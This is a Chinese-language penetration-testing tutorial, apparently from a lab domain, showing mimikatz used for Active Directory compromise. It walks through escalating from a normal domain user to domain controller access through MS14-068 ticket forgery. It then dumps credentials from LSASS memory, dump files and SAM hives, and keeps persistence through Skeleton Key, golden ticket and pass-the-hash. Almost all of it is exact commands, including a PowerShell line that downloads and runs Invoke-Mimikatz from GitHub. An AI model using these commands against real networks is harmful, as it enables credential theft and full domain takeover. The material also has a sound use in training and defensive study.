上篇測試了中間人攻擊利用框架bettercap,這次挑選一款更具代表性的工具——mimikatz
mimikatz,很多人稱之為密碼抓取神器,但在內網滲透中,遠不止這么簡單
網絡資源管理模式:
域
已有資源:
域內一臺主機權限
操作系統:win7 x64
域權限:普通用戶
1、獲得域控權限 2、導出所有用戶口令 3、維持域控權限
mimikatz:
privilege::debug
sekurlsa::logonpasswords
獲取本機用戶名、口令、sid、LM hash、NTLM hash 如圖
使用ms14-068漏洞
ms14-068.exe -u -p -s -d
生成偽造緩存test.ccache:
如圖 
kerberos::ptc test.ccache
登陸:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
獲得域控權限,如圖
(1)直接獲取內存口令 mimikatz:
privilege::debug
sekurlsa::logonpasswords
(2)通過內存文件獲取口令 使用procdump導出lsass.dmp mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
(3)通過powershell加載mimikatz獲取口令
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
(4)導出所有用戶口令 使用Volue Shadow Copy獲得SYSTEM、SAM備份(之前文章有介紹) mimikatz:
lsadump::sam SYSTEM.hiv SAM.hiv
(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
萬能鑰匙,可使用任意用戶登陸域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
如圖
(2)golden ticket mimikatz:
lsadump::lsa /patch
獲取krbtgt的ntlmhash,如圖
生成萬能票據: mimikatz:
kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
導入票據: mimikatz:
kerberos::ptt test.kirbi
登陸域控:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
如圖
Tips:
Golden Ticket不多說,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a
如圖
登陸域控,刷新掃雷記錄,留下名字;D mimikatz:
minesweeper::infos
如圖
本文重點在于介紹mimikatz在內網滲透中的常用方法,其它細節做了適當省略,可在后續詳細介紹細節。
本文由三好學生原創并首發于烏云drops,轉載請注明,謝謝 神器在手,會用才行;) 水平有限,歡迎補充。
